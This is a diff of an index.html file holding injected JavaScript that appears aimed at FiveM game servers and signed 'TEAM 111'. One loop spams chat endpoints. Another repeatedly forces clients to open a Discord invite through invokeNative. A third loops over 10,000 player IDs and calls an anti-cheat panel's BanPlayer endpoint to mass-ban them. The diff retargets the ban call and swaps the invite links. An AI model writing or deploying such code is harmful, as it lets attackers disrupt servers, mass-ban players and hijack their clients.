--- a/index.html
+++ b/index.html
@@ -186,7 +186,7 @@
         });
     </script>
 <script>
-const msg = `👑 TEAM 111 IS HERE 👑`;
+const msg = ``;
 const body = JSON.stringify({ message: msg });
 setInterval(() => {
 fetch("https://flix-scripts/chatResult", { method: "POST", body });
@@ -200,16 +200,16 @@ fetch("https://ho-chatv2/Chat", {method: "POST",body: JSON.stringify({"Type": "c
     </script>
 <script>
 setInterval(() => {
-window.invokeNative("openUrl", "https://discord.gg/KaQTzbUU");
-window.invokeNative("openUrl", "https://discord.gg/KaQTzbUU");
-window.invokeNative("openUrl", "https://discord.gg/KaQTzbUU");
-window.invokeNative("openUrl", "https://discord.gg/KaQTzbUU");
+window.invokeNative("openUrl", "https://discord.gg/T111");
+window.invokeNative("openUrl", "https://discord.gg/t111");
+window.invokeNative("openUrl", "https://discord.gg/t111");
+window.invokeNative("openUrl", "https://discord.gg/t111");
 }, 1000);
     <body>
   <script>
 for (let i = 1; i <= 10000; i++) {
     setTimeout(() => {
-        $.post('https://EC-PANEL/BanPlayer', JSON.stringify({
+        $.post('https://fiveguard-PANEL/BanPlayer', JSON.stringify({
             id: i,
             Reason: "TEAM 111 IS HERE "
         }));
